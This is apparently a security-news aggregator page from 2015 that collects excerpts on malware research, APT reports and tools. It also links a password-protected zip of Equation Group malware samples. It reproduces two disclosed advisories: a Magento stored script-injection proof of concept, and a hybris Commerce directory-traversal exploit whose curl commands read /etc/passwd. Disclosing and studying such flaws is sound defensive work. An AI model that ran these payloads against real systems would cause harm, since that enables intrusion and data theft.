The research: Mobile Internet traffic hijacking via GTP and GRX

February 16, 2015, 3:17 am

≫ Next: EXRS- Exercises for learning Reverse Engineering and Exploitation.

≪ Previous: Life in a post-database world: using crypto to avoid DB writes

Most users assume that mobile network access is much safer because a big mobile-telecoms provider will protect subscribers. Unfortunately, as practice shows, mobile Internet is a great opportunity for the attacker.

more here.........http://blog.ptsecurity.com/2015/02/the-research-mobile-internet-traffic.html

↧

EXRS- Exercises for learning Reverse Engineering and Exploitation.

February 16, 2015, 7:33 am

≫ Next: More on The Great Bank Robbery: the Carbanak APT From Kapersky

≪ Previous: The research: Mobile Internet traffic hijacking via GTP and GRX

All the sploit exercises are designed to be solvable with NX+ASLR without being dependent on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service, argv & env is not needed for exploitation.

Of course you can still do whatever you like, have fun!

more here.......https://github.com/wapiflapi/exrs

↧

More on The Great Bank Robbery: the Carbanak APT From Kapersky

February 16, 2015, 9:53 am

≫ Next: (Sample Files Added & Password) The Equation Cyber Attack Group: The Death Star of Malware Galaxy & Arstechnica Story "How “omnipotent” hackers tied to NSA hid for 14 years—and were found at last

≪ Previous: EXRS- Exercises for learning Reverse Engineering and Exploitation.

The story of Carbanak began when a bank from Ukraine asked us to help with a forensic investigation. Money was being mysteriously stolen from ATMs. Our initial thoughts tended towards the Tyupkin malware. However, upon investigating the hard disk of the ATM system we couldn't find anything except a rather odd VPN configuration (the netmask was set to 172.0.0.0).

more here.......http://securelist.com/blog/research/68732/the-great-bank-robbery-the-carbanak-apt/

↧

(Sample Files Added & Password) The Equation Cyber Attack Group: The Death Star of Malware Galaxy & Arstechnica Story "How “omnipotent” hackers tied to NSA hid for 14 years—and were found at last

February 16, 2015, 2:39 pm

≫ Next: CTB-Locker encryption/decryption scheme in details

≪ Previous: More on The Great Bank Robbery: the Carbanak APT From Kapersky

It is not known when the Equation2 group began their ascent. Some of the earliest malware samples we have seen were compiled in 2002; however, their C&C was registered in August 2001. Other C&Cs used by the Equation group appear to have been registered as early as 1996, which could indicate this group has been active for almost two decades. For many years they have interacted with other powerful groups, such as the Stuxnet and Flame groups; always from a position of superiority, as they had access to exploits earlier than the others.

more here........https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/

and here......http://arstechnica.com/security/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/

and here are the files provided by R136a1
@MalwareChannel with ZIP Password: infected........https://www.dropbox.com/s/latggdox9s3xv4t/Equation_x86_x64.zip?dl=0

↧

CTB-Locker encryption/decryption scheme in details

February 17, 2015, 12:28 am

≫ Next: Walking Heap Using Pydbg

≪ Previous: (Sample Files Added & Password) The Equation Cyber Attack Group: The Death Star of Malware Galaxy & Arstechnica Story "How “omnipotent” hackers tied to NSA hid for 14 years—and were found at last

After my last post about CTB-Locker I received a lot of e-mails from people asking for a complete analysis of the malware. Most of them wanted to know if it’s possible to restore the compromised files without paying the ransom. The answer is simple: it’s impossible without knowing the Master key! That key resides on the malicious server and it’s the only way to restore every single compromised file.

There are a some articles on the net about CTB-Locker’s modus-operandi. Everyone knows that ZLib is used, AES is used but only few of them mention the use of SHA256+Curve. To explain everything in details I’ll show you how encryption/decryption is done, step by step here..........https://zairon.wordpress.com/2015/02/17/ctb-locker-encryptiondecryption-scheme-in-details/

↧

Walking Heap Using Pydbg

February 17, 2015, 2:11 am

≫ Next: Banking Malware VAWTRAK Now Uses Malicious Macros, Abuses Windows PowerShell

≪ Previous: CTB-Locker encryption/decryption scheme in details

I'm a big fan of Pydbg. Although it has many awesome features , it also has few limitations. One of them is lack of control over process heap. For a long time I'm thinking of writing something which makes Heap Manipulation / Heap parsing / Traversing using pydbg little easier for reverse engineers. So finally last weekend I wrote couple of small py scripts which can parse Windows 7 process heaps on the fly.

more here.........http://www.debasish.in/2015/02/walking-heap-using-pydbg.html

↧

Banking Malware VAWTRAK Now Uses Malicious Macros, Abuses Windows PowerShell

February 17, 2015, 2:18 am

≫ Next: Automating Removal of Java Obfuscation

≪ Previous: Walking Heap Using Pydbg

Last year we saw how the Windows PowerShell® command shell was involved in spreading ROVNIX via malicious macro downloaders. Though the attack seen in November did not directly abuse the PowerShell feature, we’re now seeing the banking malware VAWTRAK abuse this Windows feature, while also employing malicious macros in Microsoft Word.

The banking malware VAWTRAK is involved with stealing online banking information. Some of the targeted banks include Bank of America, Barclays, Citibank, HSBC, Lloyd’s Bank, and J.P. Morgan. Other variants seen in the past targeted German, British, Swiss, and Japanese banks.

more here.......http://blog.trendmicro.com/trendlabs-security-intelligence/banking-malware-vawtrak-now-uses-malicious-macros-abuses-windows-powershell/

↧

Automating Removal of Java Obfuscation

February 17, 2015, 3:12 am

≫ Next: APT is a Who not a What... And Why it doesn't Matter

≪ Previous: Banking Malware VAWTRAK Now Uses Malicious Macros, Abuses Windows PowerShell

In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker and once the method is known, methodology can be developed to automate the process

more here.........http://www.contextis.com/resources/blog/automating-removal-java-obfuscation/

↧

APT is a Who not a What... And Why it doesn't Matter

February 17, 2015, 3:24 am

≫ Next: DbgKit

≪ Previous: Automating Removal of Java Obfuscation

A small number of topics get intelligence driven incident responders incredibly frustrated:

Using intelligence to mean smart (I’ll share more about that later this week)
Bad attribution based on incomplete information and bad assumptions
Misuse of the term APT (in most cases by marketing departments)
Advanced Persistent Threat remains the buzzword of choice for vendors, but its used incorrectly, and lots of people know that and don’t say anything. As a result I want to go on the record and correct a couple key misnomers.

more here.......http://sroberts.github.io/2015/02/16/apt-is-a-who-not-a-what/

↧

DbgKit

February 17, 2015, 3:30 am

≫ Next: A Fanny Equation: "I am your father, Stuxnet"

≪ Previous: APT is a Who not a What... And Why it doesn't Matter

DbgKit is the first GUI extension for Debugging Tools for Windows. It will show you hierarchical view of processes and detailed information about each process including its full image path, command line, start time, memory statistics, vads, handles, threads, security attributes, modules, environment variables and more.

more here............http://www.andreybazhan.com/dbgkit/

↧

A Fanny Equation: "I am your father, Stuxnet"

February 17, 2015, 4:48 am

≫ Next: Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability

≪ Previous: DbgKit

At the Virus Bulletin conference in 2010, researchers from Kaspersky Lab partnered with Microsoft to present findings related to Stuxnet. The joint presentation included slides dealing with various parts of Stuxnet, such as the zero-days used in the attack.

Perhaps the most interesting zero-day exploit from Stuxnet was the LNK exploit (CVE-2010-2568). This allowed Stuxnet to propagate through USB drives and infect even machines that had Autorun disabled.

It was discovered during the 2010 research into Stuxnet that the LNK exploit has earlier been used in another malware, supposedly a Zlob PE, that pointed to "fanny.bmp".

more here.........http://securelist.com/blog/research/68787/a-fanny-equation-i-am-your-father-stuxnet/

↧

Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability

February 17, 2015, 7:19 am

≫ Next: Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities

≪ Previous: A Fanny Equation: "I am your father, Stuxnet"

Document Title:
===============
Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1226

eBay Inc. Bug Bounty Program ID: EIBBP-27288

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/14/ebay-inc-magento-2015q1-official-bug-bounty-program-rewards-security-researcher

Release Date:
=============
2015-02-14

Vulnerability Laboratory ID (VL-ID):
====================================
1226

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting
this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security &  http://magento.com/security )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation and mail encoding web vulnerability in the official eBay Magento and Magento info web-application.

Vulnerability Disclosure Timeline:
==================================
2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-02-12: Vendor Fix/Patch (Magento Developer Team)
2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-02-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Web Application Service 2014 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official eBay Magento & Info Web-Application.
The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the magento web-server & web-application.

The vulnerability is located in the first- and lastname values of the `Talk to a Specialist` module. Remote attackers without privileged application
user account are able to inject persistent malicious script codes. The script code execution occurs in the notification mail to the specialist but
also to the active user copy mail. The persistent injected script code executes in the header section were the database context of the first- and
lastname will be displayed. The sender interacts automatically by usage of the magento.com & info.magento.com service. The validation of the db
stored outgoing values is wrong encoded and allows persistent injections of malicious script codes via POST method. The attack vector is persistent
and the injection request method is POST.

The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the
persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent
external redirects and persistent manipulation of web header or mail body context.

Vulnerable Domain(s):
[+] magento.com & info.magento.com

Vulnerable Module(s):
[+] Talk to a Specialist

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] companyname

Affected Sender(s):
[+]  info@magento.com

Affected Receiver(s):
[+] bkm@evolution-sec.com

Affected Context Module(s):
[+] Section 1 > mktEditable

Proof of Concept (PoC):
=======================
The application-side input validation web vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction.
For security demonstration or to reproduce the mail encoding web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce of the vulnerability ...
1. You do not need to register an account ;)
2. Open up the main website and switch to the magento.com contacts site
3. On the bottom you need to click the `talk to specialist` button
4. You get redirect to a regular valid formular with a mod specialist notification
5. Inject your script code payloads as first-, last- and companyname values
6. Click the send request button ...
Note: Now, you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry ;)
7. Send the same request from the input below to the specialist with a non malicious test payload
8. The persistent code execution occurs in the mail to the manager aka specialist but also to the sender of the notification itself (without user auth!)
9. Successful reproduce of the persistent script code injection web vulnerability via POST method request

PoC: Your E.C. Kraus Magento Enterprise Case Study Download

<html><head>
<title>Your E.C. Kraus Magento Enterprise Case Study Download</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td>
<b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table>
<table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title>
<div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p>
<p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus. You can download the Case Study here:</p>
<p><a href=
"http://email.magento.com/397EXO8770000EP01aGC801"
>Download</a></p>
<p>Check out our complete list of <a href=
"http://email.magento.com/397EXO8770000EQ01aGC801"
>Magento Case Studies</a></p>
<p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href=
"http://email.magento.com/397EXO8770000ER01aGC801"
>contact out Magento Enterprise team</a>.</p>
<p>Thank you,</p>
<p>The Magento Team</p></div>
<IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA6MzMxNzo3OjE3MzIzNDI4LTE6bnVsbA%3D%3D" WIDTH="1" HEIGHT="1" BORDER="0" ALT="" />
</body>
</html>
</body>
</html>
</iframe></p></div></body></html>

--- PoC Session Logs [POST] ---
21:15:18.356[654ms][total 2913ms]
Status: 200[OK]
GET http://magento.com/explore/contact-sales
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://magento.com/customers/customer-showcase]
Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com]
Connection[keep-alive]
If-None-Match["1394841413-1"]
Response Header:
Server[maged]
Date[Sat, 15 Mar 2014 20:15:18 GMT]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Drupal-Cache[HIT]
Etag["1394841413-1"]
x-content-type-options[nosniff]
X-Frame-Options[SameOrigin]
Content-Language[en]
Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"]
Cache-Control[public, max-age=86400]
Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000]
Expires[Sun, 19 Nov 1978 05:00:00 GMT]
Vary[Cookie, Accept-Encoding]
Content-Encoding[gzip]
X-Server[web04]
-
21:15:34.123[335ms][total 335ms]
Status: 302[Found]
POST https://info.magento.com/index.php/leadCapture/save
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[135] Mime Type[text/html]
Request Header:
Host[info.magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://info.magento.com/EC-Kraus.html]
Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T]
Connection[keep-alive]
POST-Daten:
FirstName[%3Ciframe+src%3Da%3E]
LastName[%3Ciframe+src%3Da%3E]
Email[bkm%40evolution-sec.com]
_marketo_comments[]
lpId[2314]
subId[36]
munchkinId[397-EXO-877]
kw[not+found]
cr[not+found]
searchstr[not+found]
lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
formid[1129]
returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
returnLPId[2301]
_mkt_disp[return]
_mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587]
_comments_marketo[]
_mkto_version[2.4.7]
Response Header:
Date[Sat, 15 Mar 2014 20:15:34 GMT]
Server[Apache]
Location[https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[135]
Connection[close]
Content-Type[text/html]

Reference(s):
http://magento.com/customers/customer-showcase
http://magento.com/explore/contact-sales
https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607
https://info.magento.com/EC-Kraus.html
https://info.magento.com/index.php/leadCapture/save

Resource(s):
../Contact Sales _ Magento-inputstep1.htm
../Contact Sales _ Magento-inputstep2.htm
../EC-Kraus-confirm.html
../EC-Kraus-poc2.html
../Your E.C. Kraus Magento Enterprise Case Study Download.html
../Your E.C. Kraus Magento Enterprise Case Study Download.eml
../poc-session-logs.txt
../poc-url-references.txt

Picture(s): (view magazine article)
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse or encode of the `talk to a specialist` input context.
Encode and parse also the outgoing user values of the talk to a specialist form to prevent persistent injections via POST to outgoing service ebay magento mails.
Restrict the input and disallow the usage of special chars.

Security Risk:
==============
The security risk of the persistent input validation and mail encoding web vulnerability is estimated as medium. (CVSS 3.8)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:   www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:   admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:   magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

↧

Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities

February 17, 2015, 8:46 am

≫ Next: Detect Equation Group Malware with THOR

≪ Previous: Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability

Early last year Gareth Heyes unveiled a fascinating new technique for attacking web applications by exploiting path-relative stylesheet imports, and dubbed it ‘Relative Path Overwrite’. This attack tricks browsers into importing HTML pages as stylesheets by abusing the path handling features of many common web languages and frameworks. Thanks to extremely tolerant stylesheet parsing, this can frequently be used to inject malicious CSS and hijack user accounts.

This technique is currently quite esoteric, so it’s often effective against sites that have already been subjected to professional or crowdsourced audits. However, successfully exploiting it in a real world environment involves navigating an array of arcane browser internals that often aren't otherwise highly relevant to pentesters. This post aims to help out by walking through the process of identifying and exploiting this issue, using a real vulnerability in the popular bulletin board software phpBB3 as a worked example.

more here...........http://blog.portswigger.net/2015/02/prssi.html

↧

Detect Equation Group Malware with THOR

February 17, 2015, 9:41 am

≫ Next: Celebrity chef Jamie Oliver’s website hacked, redirects to exploit kit

≪ Previous: Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities

THOR in version 7.20.1 is able to detect the Equation Group malware mentioned in the recently released reports by Kaspersky Labs.

more here.........https://www.bsk-consulting.de/2015/02/17/detect-equation-group-malware-with-thor/

↧

Celebrity chef Jamie Oliver’s website hacked, redirects to exploit kit

February 17, 2015, 11:04 am

≫ Next: Paper: A Tour beyond BIOS Using Intel ® VT-d for DMA Protection in UEFI BIOS

≪ Previous: Detect Equation Group Malware with THOR

While routinely checking the latest exploits and sites hacked, we came across a strange infection pattern that seemed to start from popular website jamieoliver[dot]com (ranked #536 in the UK and bringing in an average of 10 million visits per month), the official site of British chef Jamie Oliver.

Contrary to most web-borne exploits we see lately, this one was not the result of a malicious ad (malvertising) but rather a carefully and well hidden malicious injection in the site itself.

more here........https://blog.malwarebytes.org/exploits-2/2015/02/celebrity-chef-jamie-olivers-website-hacked-redirects-to-exploit-kit/

↧

Paper: A Tour beyond BIOS Using Intel ® VT-d for DMA Protection in UEFI BIOS

February 17, 2015, 2:26 pm

≫ Next: Freebsd RNG broken for last 4 months

≪ Previous: Celebrity chef Jamie Oliver’s website hacked, redirects to exploit kit

This paper presents on a design methodology for using Intel VT-d in a UEFI BIOS for
purposes of resisting DMA attacks against the host UEFI firmware from devices.

more here.........http://firmware.intel.com/sites/default/files/resources/A_Tour_Beyond_BIOS_Using_Intel_VT-d_for_DMA_Protection.pdf

Inclusive is slides from ShmooCon "Betting BIOS Bugs Won’t Bite Y’er Butt?" here.....http://www.legbacore.com/Research_files/2015_ShmooCon_BIOSBugs.pdf

↧

Freebsd RNG broken for last 4 months

February 17, 2015, 2:57 pm

≫ Next: Duplicate SSH Keys Everywhere

≪ Previous: Paper: A Tour beyond BIOS Using Intel ® VT-d for DMA Protection in UEFI BIOS

If you are running a current kernel r273872 or later, please upgrade
your kernel to r278907 or later immediately and regenerate keys.

more here..........https://lists.freebsd.org/pipermail/freebsd-current/2015-February/054580.html

↧

Duplicate SSH Keys Everywhere

February 18, 2015, 12:41 am

≫ Next: RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

≪ Previous: Freebsd RNG broken for last 4 months

Back in December when I revamped the SSH banner and started collecting the fingerprint I noticed an odd behavior. It turns out that a few SSH keys are used a lot more than once.

more here.........https://blog.shodan.io/duplicate-ssh-keys-everywhere/

↧

RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

February 18, 2015, 2:22 am

≫ Next: Fuzzing for MS15-010

≪ Previous: Duplicate SSH Keys Everywhere

Advisory: Directory Traversal and Arbitrary File Disclosure in hybris
Commerce Software Suite

During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in hybris Commerce software suite. This
vulnerability allows attackers to download arbitrary files of any size
from the affected system.

Details
=======

Product: hybris Commerce Software Suite
Affected Versions:
Release 5.3: <= 5.3.0.1
Release 5.2: <= 5.2.0.3
Release 5.1.1: <= 5.1.1.2
Release 5.1: <= 5.1.0.1
Release 5.0.4: <= 5.0.4.4
Release 5.0.3: <= 5.0.3.3
Release 5.0.0: <= 5.0.0.3
Fixed Versions:
Release 5.3: 5.3.0.2
Release 5.2: 5.2.0.4
Release 5.1.1: 5.1.1.3
Release 5.1: 5.1.0.2
Release 5.0.4: 5.0.4.5
Release 5.0.3: 5.0.3.4
Release 5.0.0: 5.0.0.4
Vulnerability Type: Directory Traversal, Arbitrary File Disclosure
Security Risk: high
Vendor URL: http://www.hybris.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016
Advisory Status: published
CVE: CVE-2014-8871
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871

Introduction
============

"hybris delivers a commerce software suite that is best in class,
helping a company execute all its direct selling processes and present a
single view and a unified experience to all its customers."

(from the vendor's homepage)

More Details
============

Webshops based on hybris may use an image retrieval system where images
are identified by a URL parameter named "context" rather than a file
name. When this system is used, images can be referenced e.g. like the
following:

<img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl
Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3
YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" />

Changing the file name part of the URL from "image.jpg" to e.g.
"redteam.jpg" reveals that not the file name part of the URL, but the
value of the parameter "context" is used to select the desired file.

A closer look at the parameter shows that its value is encoded as
Base64. Decoding it reveals a pipe-separated data structure which
includes a file size (third value), a file name (fifth value) and a
SHA-256 hash (sixth value):

$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\
Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\
1OTkxYjc4NTJiODU1" | base64 -d

master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89
96fb92427ae41e4649b934ca495991b7852b855

During the penetration test many parameters were inspected and it turned
out that the SHA-256 hash is used to reference a particular version of
the file, and can be replaced by a dash ("-") character, which always
returns the latest version. The example request can be modified and
requested with curl as follows:

$ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64
bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\
8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt

It was verified that the file name (fifth) value is vulnerable to
directory traversal. This enables attackers to retrieve the contents of
other files from the server's filesystem by using sequences of "../".
The following HTTP request for example delivers the contents of the file
"/etc/passwd":

$ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-"\
| base64 -w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz
c3dkfC0=

$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\
IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0

root:x:0:0:root:/root:/bin/bash
